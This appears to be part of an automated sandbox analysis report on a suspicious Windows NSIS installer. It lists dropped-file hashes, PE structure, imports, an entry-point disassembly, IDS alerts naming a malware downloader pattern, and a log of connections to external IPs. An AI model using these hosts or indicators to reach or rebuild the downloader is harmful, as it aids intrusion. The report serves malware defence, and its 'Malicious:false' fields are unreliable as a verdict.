                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):456900
                                                                                                                                                Entropy (8bit):6.95283114468952
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:lBahjMqcVGbP4t0p20jQAdX/O9u3zZERyl3BOg16nXVo65mB:DW6Gb40pbjQAl/O9uVl3T+lo65mB
                                                                                                                                                MD5:12C496943A29DCF170BDE98D58822B0E
                                                                                                                                                SHA1:CEF5BAF827A17A114C4B7F40F648B8F32DDF38FD
                                                                                                                                                SHA-256:8974424451EF540534850E0EFE2D71E8E40A4669E43337E8FB1DBEDEAB46C7AE
                                                                                                                                                SHA-512:29F9428F5F50E665070474715F6E7ACD9DA5267B459779AFDA0F4B8FF3E72EB9604E49C9B47F076E5F69DD8BAC75D398180F38AE0824F4EA863F4A73EB9E6B2D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):424812
                                                                                                                                                Entropy (8bit):1.2532745203430722
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:zQN1zNkWceUPEvf5mtuQTyT0Vupr6jgDTslr7WSn3Dpbvj33BIUaE6SKCBLnSOXQ:6GkbAmorbpf6nP6e6RlY8R2KNsyB
                                                                                                                                                MD5:A8D5999B820E9BA7EC8AE02AC64BD740
                                                                                                                                                SHA1:162064D1816D6723954401E5FF406FB815B1FF01
                                                                                                                                                SHA-256:F3F32F4EE9A9CF103B9E6876518F46801AA187864024B28DE7F36AB7A1A00B7F
                                                                                                                                                SHA-512:6D4DC54EA8653AF4D088E8B058ED07F25F8E2B92571C688BDEBF32759DA813C34A3D5B9BCB1095619C67B5797B2881B2F227B8EA592BDCCB3870B1E8A40E1312
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:......2.t................................................#................................(.................................C..(..................$.........................................................y................................................................................[...x.........................>................W.....................................................T....a........................................................H..................u...p.....!.............................................................................................q.....H.........l..K...............`..........R........................f..............................................................+......\.................V......................o.....C.....}...........l..........&............0........ ..n.......O....*.............q............|............................*.........................._....9.......3....I.........G..............................................................
                                                                                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):486557
                                                                                                                                                Entropy (8bit):1.2517544244225545
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:uRoqTXoly8kLiqpTbJDQAw9WGCEHBg2Ed5:2IkLfpTlDQAOL
                                                                                                                                                MD5:4F7A0E04C31521449860638552DDC981
                                                                                                                                                SHA1:D6FF38322926347DED812C57690D26DD6BB167A0
                                                                                                                                                SHA-256:37B7F63261C13F15D9889F297B29273A7B81EB306009F466A0A4383C954F7F49
                                                                                                                                                SHA-512:B5620E786B307EBF3259AE6B5AACD8E2A9B75427DAA88C6CDEBD0D0E62A5ACE6983A131F2B70E35703BEA0E3CEFD4A9B26B7706AEFBECB87F7AFAE0B38740CC9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:................P.............................................T....=.........yO.........t..................................W.................................=..................................................................................................................y.........................................................N.....H.................................................................................l.................,..............................]...............:....................................J...}.............................................................................$.........................................=....A....................3.........................................................................7........e...N................#...........................M........................Z....................................................j.................................L........O............................z......,.................c.........3............
                                                                                                                                                Process:C:\Users\user\Desktop\________.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):207254
                                                                                                                                                Entropy (8bit):1.2604686518033184
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:od51waTQFApCdHNsdUp09xiXes7NAnAC+qFvVdhVMtdubYN/UIC6mTtRzcScEfQt:hA6C9AG+alAKUcyZ9oE
                                                                                                                                                MD5:43A8D782AD3A56D7ECD14E52CAEA0F41
                                                                                                                                                SHA1:FCDFF92EC42BEDC2297AE1ECB3C8A009E9A900BF
                                                                                                                                                SHA-256:06AB90D835D1CCFF3CFD1AE37956891918190037D989B4072B4E7ABD5B5418C6
                                                                                                                                                SHA-512:6EEBAC37056096ED7C0C97EA44A4FEDB7DD54DF826171F5733FF72AE0943C6D156F66CCD8239866180AF8FC7793480EDCCACE317BE58F37BEFB12CA43A390871
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...........................i.......................0..........................................................................................................................!.....m..............-....................................................5..e.~........e............ .................................................U.......0{.........B.....................*.................................................................................j...........y................p.............................................................................................a.................o.............................................K.....~.....(...........................D........t.............................................................[.&...... .............................................................m..............x.......................^...........................B...'.........k.....u................L................................................................T..........
                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                Entropy (8bit):7.6649956695668875
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:________.exe
                                                                                                                                                File size:847'584 bytes
                                                                                                                                                MD5:89b3b4723ea3983fc0f103eaf3093edc
                                                                                                                                                SHA1:bb6fb38b57fd6694e0803d1de469f0a326e231f4
                                                                                                                                                SHA256:69a0042174fbffed7ac840081ec1d5618f2a70fe4d56078b98a1db06627f9eab
                                                                                                                                                SHA512:74befa13a84be96af3d7209113b11511dde96835c1a8a7a3453649cddf383d356a034632c58cc4778389495625fef0da894c03a75e5e04afdcf6eadc3dc947fa
                                                                                                                                                SSDEEP:24576:UvYV0HT73uFztJXcrBbO3j8xa93BPapMMjC+eN3o67:POzaRcBbO3j193SLjC+ko
                                                                                                                                                TLSH:C4051242F6D4816AF82A013291575F726F6364317F1C5A9B37F73B5E5830286AB3823E
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@
                                                                                                                                                Icon Hash:4975784d4f49613b
                                                                                                                                                Entrypoint:0x40335a
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x536FD79B [Sun May 11 20:03:39 2014 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                                                                Signature Valid:false
                                                                                                                                                Signature Issuer:CN=Bedyrelserne, O=Bedyrelserne, L=Digne-les-Bains, C=FR
                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                Error Number:-2146762487
                                                                                                                                                Not Before, Not After
                                                                                                                                                • 29/03/2024 01:42:17 29/03/2027 02:42:17
                                                                                                                                                Subject Chain
                                                                                                                                                • CN=Bedyrelserne, O=Bedyrelserne, L=Digne-les-Bains, C=FR
                                                                                                                                                Version:3
                                                                                                                                                Thumbprint MD5:85F3BBB62036402FF36E1128FB3D8107
                                                                                                                                                Thumbprint SHA-1:8701ACC0AA00C95218234E53568933E79BEDFECE
                                                                                                                                                Thumbprint SHA-256:A551FF79E19AF7881A8BBD33B3ED54C0D737B5DADACD1E5B7BE771B27C739712
                                                                                                                                                Serial:590ECF4911EDE00D44E5D1250CB96FC4C625C4B8
                                                                                                                                                Instruction
                                                                                                                                                sub esp, 000002D4h
                                                                                                                                                push ebx
                                                                                                                                                push ebp
                                                                                                                                                push esi
                                                                                                                                                push edi
                                                                                                                                                push 00000020h
                                                                                                                                                xor ebp, ebp
                                                                                                                                                pop esi
                                                                                                                                                mov dword ptr [esp+14h], ebp
                                                                                                                                                mov dword ptr [esp+10h], 00409230h
                                                                                                                                                mov dword ptr [esp+1Ch], ebp
                                                                                                                                                call dword ptr [00407034h]
                                                                                                                                                push 00008001h
                                                                                                                                                call dword ptr [004070BCh]
                                                                                                                                                push ebp
                                                                                                                                                call dword ptr [004072ACh]
                                                                                                                                                push 00000008h
                                                                                                                                                mov dword ptr [00429298h], eax
                                                                                                                                                call 00007F40ACD59B1Ch
                                                                                                                                                mov dword ptr [004291E4h], eax
                                                                                                                                                push ebp
                                                                                                                                                lea eax, dword ptr [esp+34h]
                                                                                                                                                push 000002B4h
                                                                                                                                                push eax
                                                                                                                                                push ebp
                                                                                                                                                push 00420690h
                                                                                                                                                call dword ptr [0040717Ch]
                                                                                                                                                push 0040937Ch
                                                                                                                                                push 004281E0h
                                                                                                                                                call 00007F40ACD59787h
                                                                                                                                                call dword ptr [00407134h]
                                                                                                                                                mov ebx, 00434000h
                                                                                                                                                push eax
                                                                                                                                                push ebx
                                                                                                                                                call 00007F40ACD59775h
                                                                                                                                                push ebp
                                                                                                                                                call dword ptr [0040710Ch]
                                                                                                                                                cmp word ptr [00434000h], 0022h
                                                                                                                                                mov dword ptr [004291E0h], eax
                                                                                                                                                mov eax, ebx
                                                                                                                                                jne 00007F40ACD56C6Ah
                                                                                                                                                push 00000022h
                                                                                                                                                mov eax, 00434002h
                                                                                                                                                pop esi
                                                                                                                                                push esi
                                                                                                                                                push eax
                                                                                                                                                call 00007F40ACD591C6h
                                                                                                                                                push eax
                                                                                                                                                call dword ptr [00407240h]
                                                                                                                                                mov dword ptr [esp+18h], eax
                                                                                                                                                jmp 00007F40ACD56D2Eh
                                                                                                                                                push 00000020h
                                                                                                                                                pop edx
                                                                                                                                                cmp cx, dx
                                                                                                                                                jne 00007F40ACD56C69h
                                                                                                                                                inc eax
                                                                                                                                                inc eax
                                                                                                                                                cmp word ptr [eax], dx
                                                                                                                                                je 00007F40ACD56C5Bh
                                                                                                                                                add word ptr [eax], 0000h
                                                                                                                                                Programming Language:
                                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x28c48.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xccce80x21f8
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x5e680x60002f6554958e1a5093777de617d6e0bffcFalse0.6566162109375data6.419811957742583IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0x90000x202d80x6009587277f9a9b39e2caf86eae07909d87False0.4733072916666667data3.757932017065988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .ndata0x2a0000x290000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .rsrc0x530000x28c480x28e0059d6061d9f9f5498351e74e1e9b8c526False0.4770761659021407data5.198121069162778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_BITMAP0x534000x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                                RT_ICON0x537680x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.4562433455577901
                                                                                                                                                RT_ICON0x63f900x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.4870191297035947
                                                                                                                                                RT_ICON0x6d4380x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.5106746765249538
                                                                                                                                                RT_ICON0x728c00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.5217879074161549
                                                                                                                                                RT_ICON0x76ae80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.5518672199170125
                                                                                                                                                RT_ICON0x790900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.6116322701688556
                                                                                                                                                RT_ICON0x7a1380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.6635245901639344
                                                                                                                                                RT_ICON0x7aac00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.7340425531914894
                                                                                                                                                RT_DIALOG0x7af280x144dataEnglishUnited States0.5216049382716049
                                                                                                                                                RT_DIALOG0x7b0700x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                                RT_DIALOG0x7b1b00x120dataEnglishUnited States0.5173611111111112
                                                                                                                                                RT_DIALOG0x7b2d00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                RT_DIALOG0x7b3f00xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                RT_DIALOG0x7b4b80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                RT_GROUP_ICON0x7b5180x76dataEnglishUnited States0.7542372881355932
                                                                                                                                                RT_VERSION0x7b5900x3acdataEnglishUnited States0.4521276595744681
                                                                                                                                                RT_MANIFEST0x7b9400x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                                                                                DLLImport
                                                                                                                                                KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                                                                USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                                ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                EnglishUnited States
                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-11-12T07:36:32.879752+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.849706TCP
                                                                                                                                                2024-11-12T07:36:47.682495+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849715193.122.130.080TCP
                                                                                                                                                2024-11-12T07:36:48.280641+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849715193.122.130.080TCP
                                                                                                                                                2024-11-12T07:36:49.593155+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849715193.122.130.080TCP
                                                                                                                                                2024-11-12T07:36:50.311923+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849717188.114.96.3443TCP
                                                                                                                                                2024-11-12T07:36:51.686922+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849718193.122.130.080TCP
                                                                                                                                                2024-11-12T07:36:52.391719+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849719188.114.96.3443TCP
                                                                                                                                                2024-11-12T07:37:12.770892+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.849732TCP
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 12, 2024 07:36:44.717053890 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:44.722009897 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:44.722080946 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:44.722284079 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:44.727091074 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:45.402075052 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:45.417691946 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:45.422462940 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:47.658318043 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:47.682495117 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:47.687263966 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:48.225405931 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:48.280641079 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:48.553524971 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:48.553554058 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:48.553627968 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:48.556220055 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:48.556241035 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.159504890 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.159663916 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.163140059 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.163151979 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.163546085 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.168298960 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.211333990 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.372411966 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.372477055 CET44349716188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.372725010 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.376367092 CET49716443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.381944895 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:49.386667013 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.542319059 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.544523001 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.544550896 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.544629097 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.544976950 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:49.544986963 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.593154907 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:49.772830009 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:49.772902012 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.166886091 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.169265985 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:50.169285059 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.311671972 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.311779976 CET44349717188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.311834097 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:50.312345028 CET49717443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:50.315977097 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.317079067 CET4971880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.321166039 CET8049715193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.321254969 CET4971580192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.321928978 CET8049718193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:50.322000027 CET4971880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.322083950 CET4971880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:50.326889038 CET8049718193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:51.645483017 CET8049718193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:51.646617889 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:51.646661997 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:51.646737099 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:51.646949053 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:51.646960974 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:51.686922073 CET4971880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:52.251847982 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:52.253742933 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:52.253762007 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:52.391729116 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:52.391799927 CET44349719188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:52.391866922 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:52.392374992 CET49719443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:52.397572041 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:52.402369976 CET8049720193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:52.402575016 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:52.402673006 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:52.407494068 CET8049720193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.094225883 CET8049720193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.095655918 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.095702887 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.095827103 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.096111059 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.096118927 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.140062094 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.703167915 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.704869986 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.704895020 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.848361969 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.848434925 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.848485947 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.848997116 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:53.852669001 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.853851080 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.857697964 CET8049720193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.857781887 CET4972080192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.858782053 CET8049722193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:53.858850002 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.858944893 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:53.863661051 CET8049722193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:54.510622978 CET8049722193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:54.512037039 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:54.512092113 CET44349723188.114.96.3192.168.2.8
